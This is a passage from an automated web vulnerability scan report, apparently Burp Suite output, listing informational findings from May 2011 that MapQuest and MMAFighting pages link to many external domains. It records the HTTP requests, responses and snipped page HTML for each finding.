<a href="http://www.huffingtonpost.com/2011/05/04/afghanistan-pakistan-bin-laden_n_857555.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273798/thumbs/r-AFGHANISTAN-PAKISTAN-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/273847/thumbs/r-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" id="threeup_image_857597" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/recep-tayyip-erdogan-convoy-attack_n_857624.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/273845/thumbs/r-RECEP-TAYYIP-ERDOGAN-ATTACK-medium260.jpg" border="0" width="260" height="75" id="threeup_image_857624" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/fatah-hamas-reconciliation-deal_n_857336.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/273618/thumbs/r-FATAH-HAMAS-RECONCILIATION-medium260.jpg" border="0" width="260" height="75" id="threeup_image_857336" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-prepared-to-escape_n_857453.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/273708/thumbs/r-OSAMA-BIN-LADEN-ESCAPE-medium260.jpg" border="0" width="260" height="75" id="threeup_image_857453" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/south-korea-crucifixion-b_n_857375.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/273648/thumbs/r-SOUTH-KOREA-CRUCIFIXION-medium260.jpg" border="0" width="260" height="75" id="threeup_image_857375" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/india-girls-neglect_n_857389.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/273675/thumbs/r-INDIA-MALNOURISHED-GIRLS-medium260.jpg" border="0" width="260" height="75" id="threeup_image_857389" />        </a>
...[SNIP]...

16.93. http://www.mapquest.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mapquest.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.mapquest.com/?ncid=txtlnkmqmq00000001

The response contains the following links to other domains:

http://adinfo.aol.com/about-our-ads/
http://autos.aol.com/
http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/favicon.ico
http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/logo.png
http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/page_link_image.gif
http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston
http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston-fileprint
http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston
http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston
http://daol.aol.com/main
http://jobs.aol.com/
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/omniunih.js
http://o.aolcdn.com/os/mapquest/marketing/Mothers-Day.png
http://o.aolcdn.com/os/mapquest/promo-images/newmq/questy_tear.png
http://privacy.aol.com/
http://realestate.aol.com/
http://sns-static.aolcdn.com/openauth/aolauth.min.js
http://travel.aol.com/
http://travel.aol.com/flights
http://twitter.com/mapquest
http://www.aol.com/
http://www.facebook.com/mapquest
http://www.mapquestapi.com/link-to-mapquest/
http://www.mapquesthelp.com/
http://www.mapquesthelp.com/app/answers/detail/a_id/949/
http://www.moviefone.com/
http://www.rentedspaces.com/

Request

GET /?ncid=txtlnkmqmq00000001 HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 00:57:11 GMT
Content-Length: 32072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...
<meta property="fb:app_id" content="324090988325" />
   <link rel="SHORTCUT ICON" href="http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/favicon.ico"/>

<link rel="image_src" href="http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/page_link_image.gif">


...[SNIP]...
</script>

<script src="http://sns-static.aolcdn.com/openauth/aolauth.min.js"></script>
   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston" ></script>
...[SNIP]...
<meta name="ROBOTS" content="NOODP,NOYDIR"/>

   <link href="http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston" media="screen, projection, print" rel="stylesheet" type="text/css" />
   <link href="http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston-fileprint" media="print" rel="stylesheet" type="text/css" />

   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston" ></script>
...[SNIP]...
<link rel="canonical" />

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<div id="noscript">
<img src="http://o.aolcdn.com/os/mapquest/promo-images/newmq/questy_tear.png"><br />
...[SNIP]...
<br />
<a href="http://www.mapquesthelp.com/app/answers/detail/a_id/949/">More information »</a>
...[SNIP]...
<a href="/" class="logo" id="topLogo"><img class="logoImg" src="http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/logo.png" alt="MapQuest Logo" /></a>
...[SNIP]...
com/2011/05/02/mothers-day-brunch-flowers-and-other-things-to-make-her-smile/" target="_blank" onclick="m3.util.Event.publish('EventLog', {action: 'MQ10MQPromoTopRight-mothers-day-Click'});">
<img src="http://o.aolcdn.com/os/mapquest/marketing/Mothers-Day.png" style="position:absolute;left:0px;top:0px;" />
</a>
...[SNIP]...

<a href="http://www.mapquesthelp.com/" target="_blank" class="link" id="fedbackLink" onclick="m3.util.Event.publish('EventLog', {action: 'Search-Bar-Help-Click'});" style="">Help</a>
...[SNIP]...
</a>
<a href="http://www.mapquestapi.com/link-to-mapquest/" target="_blank" omniture="Footer-MQLinkTo">${mqLinkTo}</a>
...[SNIP]...
<![endif]-->
<a href="http://www.facebook.com/mapquest" target="_blank" omniture="Footer-MQFacebook">${mqFacebook}</a>
<a href="http://twitter.com/mapquest" target="_blank" omniture="Footer-MQTwitter">${mqTwitter}</a>
...[SNIP]...
<td class="stacked">
<a href="http://www.aol.com" target="_blank" omniture="Footer-AOL">${AOL}</a>
<a href="http://travel.aol.com" target="_blank" omniture="Footer-Travel">${aolTravel}</a>
<a href="http://realestate.aol.com" target="_blank" omniture="Footer-RealEstate">${aolRealEstate}</a>
<a href="http://autos.aol.com" target="_blank" omniture="Footer-Cars">${aolCars}</a>
<a href="http://jobs.aol.com" target="_blank" omniture="Footer-Jobs">${aolJobs}</a>
...[SNIP]...
<td class="stacked">
<a href="http://www.moviefone.com" target="_blank" omniture="Footer-Movies">${aolMovies}</a>
<a href="http://travel.aol.com/flights" target="_blank" omniture="Footer-AirlineTickets">${aolAirlineTickets}</a>
<a href="http://www.rentedspaces.com" target="_blank" omniture="Footer-Apartments">${aolApartments}</a>
<a href="http://daol.aol.com/main" target="_blank" omniture="Footer-AOLProducts">${aolAllProducts}</a>
...[SNIP]...
<td class="stacked">
<a href="http://privacy.aol.com" target="_blank" omniture="Footer-PrivacyPolicy">${legalUpdatedPrivacyPolicy}</a>
...[SNIP]...
</a>
<a href="http://adinfo.aol.com/about-our-ads/" target="_blank" omniture="Footer-AboutOurAds">${legalAboutOurAds}</a>
...[SNIP]...
</script>
   <script src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

16.94. http://www.mapquest.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mapquest.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.mapquest.com/?ncid=txtlnkmqmq00000001

The response contains the following links to other domains:

http://adinfo.aol.com/about-our-ads/
http://autos.aol.com/
http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/favicon.ico
http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/logo.png
http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/page_link_image.gif
http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston
http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston-fileprint
http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston
http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston
http://daol.aol.com/main
http://jobs.aol.com/
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/omniunih.js
http://o.aolcdn.com/os/mapquest/promo-images/newmq/mq_toolbar_1.jpg
http://o.aolcdn.com/os/mapquest/promo-images/newmq/questy_tear.png
http://privacy.aol.com/
http://realestate.aol.com/
http://sns-static.aolcdn.com/openauth/aolauth.min.js
http://travel.aol.com/
http://travel.aol.com/flights
http://twitter.com/mapquest
http://www.aol.com/
http://www.facebook.com/mapquest
http://www.mapquestapi.com/link-to-mapquest/
http://www.mapquesthelp.com/
http://www.mapquesthelp.com/app/answers/detail/a_id/949/
http://www.moviefone.com/
http://www.rentedspaces.com/

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:03 GMT; Path=/
Set-Cookie: psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 00:57:02 GMT
Content-Length: 32047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...
<meta property="fb:app_id" content="324090988325" />
   <link rel="SHORTCUT ICON" href="http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/favicon.ico"/>

<link rel="image_src" href="http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/page_link_image.gif">


...[SNIP]...
</script>

<script src="http://sns-static.aolcdn.com/openauth/aolauth.min.js"></script>
   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston" ></script>
...[SNIP]...
<meta name="ROBOTS" content="NOODP,NOYDIR"/>

   <link href="http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston" media="screen, projection, print" rel="stylesheet" type="text/css" />
   <link href="http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston-fileprint" media="print" rel="stylesheet" type="text/css" />

   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston" ></script>
...[SNIP]...
<link rel="canonical" />

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<div id="noscript">
<img src="http://o.aolcdn.com/os/mapquest/promo-images/newmq/questy_tear.png"><br />
...[SNIP]...
<br />
<a href="http://www.mapquesthelp.com/app/answers/detail/a_id/949/">More information »</a>
...[SNIP]...
<a href="/" class="logo" id="topLogo"><img class="logoImg" src="http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/logo.png" alt="MapQuest Logo" /></a>
...[SNIP]...
<a href="http://features.mapquest.com/toolbar/?ncid=bannadmqmq00000058" target="_blank" onclick="m3.util.Event.publish('EventLog', {action: 'MQ10MQPromoTopRight-Toolbar_1-Ad-Click'});">
<img src="http://o.aolcdn.com/os/mapquest/promo-images/newmq/mq_toolbar_1.jpg" style="position:absolute;left:0px;top:0px;" />
</a>
...[SNIP]...

<a href="http://www.mapquesthelp.com/" target="_blank" class="link" id="fedbackLink" onclick="m3.util.Event.publish('EventLog', {action: 'Search-Bar-Help-Click'});" style="">Help</a>
...[SNIP]...
</a>
<a href="http://www.mapquestapi.com/link-to-mapquest/" target="_blank" omniture="Footer-MQLinkTo">${mqLinkTo}</a>
...[SNIP]...
<![endif]-->
<a href="http://www.facebook.com/mapquest" target="_blank" omniture="Footer-MQFacebook">${mqFacebook}</a>
<a href="http://twitter.com/mapquest" target="_blank" omniture="Footer-MQTwitter">${mqTwitter}</a>
...[SNIP]...
<td class="stacked">
<a href="http://www.aol.com" target="_blank" omniture="Footer-AOL">${AOL}</a>
<a href="http://travel.aol.com" target="_blank" omniture="Footer-Travel">${aolTravel}</a>
<a href="http://realestate.aol.com" target="_blank" omniture="Footer-RealEstate">${aolRealEstate}</a>
<a href="http://autos.aol.com" target="_blank" omniture="Footer-Cars">${aolCars}</a>
<a href="http://jobs.aol.com" target="_blank" omniture="Footer-Jobs">${aolJobs}</a>
...[SNIP]...
<td class="stacked">
<a href="http://www.moviefone.com" target="_blank" omniture="Footer-Movies">${aolMovies}</a>
<a href="http://travel.aol.com/flights" target="_blank" omniture="Footer-AirlineTickets">${aolAirlineTickets}</a>
<a href="http://www.rentedspaces.com" target="_blank" omniture="Footer-Apartments">${aolApartments}</a>
<a href="http://daol.aol.com/main" target="_blank" omniture="Footer-AOLProducts">${aolAllProducts}</a>
...[SNIP]...
<td class="stacked">
<a href="http://privacy.aol.com" target="_blank" omniture="Footer-PrivacyPolicy">${legalUpdatedPrivacyPolicy}</a>
...[SNIP]...
</a>
<a href="http://adinfo.aol.com/about-our-ads/" target="_blank" omniture="Footer-AboutOurAds">${legalAboutOurAds}</a>
...[SNIP]...
</script>
   <script src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

16.95. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The page was loaded from a URL containing a query string:

http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545

The response contains the following links to other domains:

http://about.aol.com/aolnetwork/aol_pp
http://about.aol.com/aolnetwork/mem_tos
http://about.aol.com/aolnetwork/trademarks
http://admin.brightcove.com/js/BrightcoveExperiences.js
http://allelbows.com/
http://aol.sportingnews.com/
http://aol.sportingnews.com/nba/story/2011-05-03/nba-playoff-preview-mavericks-at-lakers-game-2
http://aol.sportingnews.com/nba/story/2011-05-03/sporting-news-player-of-the-year-derrick-rose
http://aol.sportingnews.com/nfl/story/2011-05-04/five-playoff-teams-still-have-big-need-to-fill
http://aol.sportingnews.com/nfl/story/2011-05-04/rashard-mendenhall-turns-to-blog-to-clarify-controversial-tweets
http://aol.sportingnews.com/nhl/story/2011-05-04/three-games-thre-major-issues-in-stanley-cup-playoffs
http://feedback.aol.com/rs/rs.php?sid=mmafighting
http://fightmetric.com/
http://help.aol.com/
http://mail.aol.com/
http://middleeasy.com/
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/art/ch_fanhouse/articles/css/articlev15a.css
http://o.aolcdn.com/art/ch_fanhouse/articles/css/communitycommentoverwritev27.css
http://o.aolcdn.com/art/ch_fanhouse/articles/css/spherev13.css
http://o.aolcdn.com/art/ch_fanhouse/images/modules/ftrd_wrtrs/rss_feed.gif
http://o.aolcdn.com/art/ch_sports/cmnty_rating.dev.v1.0.css
http://o.aolcdn.com/art/dynaboards/cmnty_comments.v1.1.4.css
http://o.aolcdn.com/art/fanhouse/design/v2/css/jcar/lineup/skin.css?v=1.4
http://o.aolcdn.com/art/fanhouse/design/v2/css/jcar/scoreboard/skin.css?v=1.2
http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-report.gif
http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-dn.gif
http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-up.gif
http://o.aolcdn.com/art/fanhouse/design/v2/scripts/jcarousel/lib/jquery.jcarousel.css
http://o.aolcdn.com/art/feedback/feedback1.js
http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/jquery-cookie.min.js&f=/fanhouse/design/v2/scripts/origin/common.min.js&f=/fanhouse/design/v2/scripts/origin/common_orig.min.js
http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/pagination.js&f=/fanhouse/design/v2/scripts/origin/pagination-lineup.js&f=/fanhouse/design/v2/scripts/origin/jquery-cycle.js&f=/fanhouse/design/v2/scripts/origin/openauthclient.js&f=/fanhouse/design/v2/scripts/origin/blogs.js&f=/fanhouse/design/v2/scripts/origin/jsoncomments.js
http://o.aolcdn.com/feedback/feedback1.js
http://o.aolcdn.com/omniunih.js
http://o.aolcdn.com/os/fanhouse/design/MMAFighting/css/mma_fighting.css
http://o.aolcdn.com/os/fanhouse/design/v2/css/fanhouse.css?version=172
http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.addthis.min.js&file=/aol/jquery.aolphotogallery-1.0.min.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js
http://realestate.aol.com/blog/2011/01/14/texas-super-bowl-rentals-royal-rip-off/
http://rss.cnn.com/rss/si_mma.rss
http://smallbusiness.aol.com/
http://sports.cms.aol.com/dynapubcms/v3/
http://sportsillustrated.cnn.com/2011/mma/boxing/05/04/alvarez.rhodes.ap/index.html?xid=si_mma
http://sportsillustrated.cnn.com/2011/mma/boxing/05/04/pacquiao.mosley.ap/index.html?xid=si_mma
http://sportsillustrated.cnn.com/2011/writers/bryan_armen_graham/05/03/manny.pacquiao.shane.mosley.preview/index.html?xid=si_mma
http://sportsillustrated.cnn.com/2011/writers/jeff_wagenheim/05/03/may.rankings/index.html?xid=si_mma
http://sportsillustrated.cnn.com/mma/
http://superbowlads.fanhouse.com/
http://twitter.com/
http://twitter.com/mmafighting
http://www.aol.com/
http://www.aolcdn.com/ch_global/blank.gif
http://www.aolcdn.com/fanhouse/design/v2/images/rate1.gif
http://www.aolcdn.com/fanhouse/design/v2/images/rate3.gif
http://www.aolcdn.com/fanhouse/mmafighting/mma_aolhatlogo.gif
http://www.aolcdn.com/fanhouse/mmafighting/mmafighting.js
http://www.blogcdn.com/js/ajax_c.js
http://www.blogcdn.com/www.mmafighting.com/media/2011/02/ariannyceleste132.jpg
http://www.blogcdn.com/www.mmafighting.com/media/2011/02/mmawarehouse4.jpg
http://www.blogcdn.com/www.mmafighting.com/media/2011/02/pennvsfitch132-1298790818.jpg
http://www.blogcdn.com/www.mmafighting.com/media/2011/03/jonsovershogun132.jpg
http://www.blogcdn.com/www.mmafighting.com/media/2011/04/diazvsdaley13287.jpg
http://www.blogcdn.com/www.mmafighting.com/media/2011/04/gsp13.jpg
http://www.blogcdn.com/www.mmafighting.com/media/2011/04/yamatodamashiidiaries87-1302894424.jpg
http://www.blogcdn.com/www.mmafighting.com/media/2011/05/brashearmmahockey.43f84ecc70004860a601a941ca808f05.jpg
http://www.blogcdn.com/www.mmafighting.com/media/2011/05/brashearmmahockey.43f84ecc70004860a601a941ca808f05_thumbnail.jpg
http://www.blogcdn.com/www.mmafighting.com/media/2011/05/gspvsshieldsphotos132.jpg
http://www.blogsmithmedia.com/www.mmafighting.com/media/favicon.ico
http://www.bloodyelbow.com/
http://www.cagepotato.com/
http://www.dailyfinance.com/
http://www.facebook.com/mmafighting
http://www.fanhouse.com/
http://www.fightlinker.com/
http://www.gamedaily.com/
http://www.gnn.com/
http://www.lowkick.com/MMA
http://www.luxist.com/
http://www.mmawarehouse.com/
http://www.mmawarehouse.com/?bid=2&aid=CD2&opt=
http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm?bid=2&aid=CD2&opt=
http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm?bid=2&aid=CD2&opt=
http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm?bid=2&aid=CD2&opt=
http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm?bid=2&aid=CD2&opt=
http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm?bid=2&aid=CD2&opt=
http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm?bid=2&aid=CD2&opt=
http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm?bid=2&aid=CD2&opt=
http://www.prommanow.com/
http://www.sportingnews.com/rss
http://www.tuaw.com/2011/02/04/planning-a-super-bowl-party-check-out-these-apps/
http://www.tvsquad.com/2011/02/02/behind-the-scenes-at-puppy-bowl-vii/
http://www.ultimatefighter.com/
http://www.walletpop.com/blog/category/celebs-and-money/
http://www.weblogsinc.com/b-c/sns.js
https://www.fightmagazine.com/mma-magazine/subscribe.asp?trackcode=AOL2011

Request

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:18 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:17 GMT; path=/
Content-Type: text/html
Content-Length: 63415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:image" content="http://www.blogcdn.com/www.mmafighting.com/media/2011/05/brashearmmahockey.43f84ecc70004860a601a941ca808f05_thumbnail.jpg" />
<link rel="image_src" href="http://www.blogcdn.com/www.mmafighting.com/media/2011/05/brashearmmahockey.43f84ecc70004860a601a941ca808f05_thumbnail.jpg" />
   <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://mmafighting.com/rss.xml" />
...[SNIP]...

<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.addthis.min.js&file=/aol/jquery.aolphotogallery-1.0.min.js" type="text/javascript"></script>

<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/jquery-cookie.min.js&f=/fanhouse/design/v2/scripts/origin/common.min.js&f=/fanhouse/design/v2/scripts/origin/common_orig.min.js"></script>

<link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/art/fanhouse/design/v2/css/jcar/scoreboard/skin.css?v=1.2" />

<script type="text/javascript" src="http://o.aolcdn.com/art/feedback/feedback1.js"></script>


<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/pagination.js&f=/fanhouse/design/v2/scripts/origin/pagination-lineup.js&f=/fanhouse/design/v2/scripts/origin/jquery-cycle.js&f=/fanhouse/design/v2/scripts/origin/openauthclient.js&f=/fanhouse/design/v2/scripts/origin/blogs.js&f=/fanhouse/design/v2/scripts/origin/jsoncomments.js"></script>
<link rel="shortcut icon" href="http://www.blogsmithmedia.com/www.mmafighting.com/media/favicon.ico" type="image/x-icon" />


...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...

<link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/art/fanhouse/design/v2/scripts/jcarousel/lib/jquery.jcarousel.css" />
<link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/art/fanhouse/design/v2/css/jcar/lineup/skin.css?v=1.4" />


<link media="screen" type="text/css" rel="stylesheet" href="http://o.aolcdn.com/art/ch_fanhouse/articles/css/articlev15a.css" />
<link media="screen" type="text/css" rel="stylesheet" href="http://o.aolcdn.com/art/ch_fanhouse/articles/css/spherev13.css" />
<link media="screen" type="text/css" rel="stylesheet" href="http://o.aolcdn.com/art/dynaboards/cmnty_comments.v1.1.4.css" />
<link media="screen" type="text/css" rel="stylesheet" href="http://o.aolcdn.com/art/ch_sports/cmnty_rating.dev.v1.0.css" />
<link media="screen" type="text/css" rel="stylesheet" href="http://o.aolcdn.com/art/ch_fanhouse/articles/css/communitycommentoverwritev27.css" />

<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>


<script type="text/javascript" src="http://www.aolcdn.com/fanhouse/mmafighting/mmafighting.js"></script>
<link rel="stylesheet" type="text/css" media="screen" href="http://o.aolcdn.com/os/fanhouse/design/v2/css/fanhouse.css?version=172" />
<link rel="stylesheet" type="text/css" media="screen" href="http://o.aolcdn.com/os/fanhouse/design/MMAFighting/css/mma_fighting.css" />
<style type="text/css">
...[SNIP]...
</script>
<script language="JavaScript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
<li class="aolLnk"><a href="http://www.aol.com/" title="Aol."><img src="http://www.aolcdn.com/fanhouse/mmafighting/mma_aolhatlogo.gif" alt="Aol." width="32" height="12"></a></li>
               <li><a href="http://mail.aol.com" title="Mail">MAIL</a></li>
               <li class="lstLI">You might also like <a href="http://aol.sportingnews.com" title="Fleaflicker">Sporting News</a>
...[SNIP]...
<a href="#main"><img src="http://www.aolcdn.com/ch_global/blank.gif" width="1" height="1" border="0" alt="Skip to Main Content"></a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/?bid=2&aid=CD2&opt=" target="_blank" title="Store">Store</a>
...[SNIP]...
<li class="forumslink"><a onclick = "return fBo('mmafighting');" href="http://feedback.aol.com/rs/rs.php?sid=mmafighting" target="feedback">Send Us Feedback</a>
...[SNIP]...
<div class="entry-content" id="19931900">
<img vspace="4" hspace="4" border="1" align="right" alt="" src="http://www.blogcdn.com/www.mmafighting.com/media/2011/05/brashearmmahockey.43f84ecc70004860a601a941ca808f05.jpg" />Donald Brashear will make his MMA debut on June 4 against a relatively unknown heavyweight.<br />
...[SNIP]...
<br />
According to <a target="_blank" href="http://twitter.com/#!/NicLandryRDS">Nic Landry of RDS</a>
...[SNIP]...
<a target="_blank"
href=""http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm?bid=2&aid=CD2&opt=" target="_blank">
<img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/04/gsp13.jpg">
</div>
...[SNIP]...
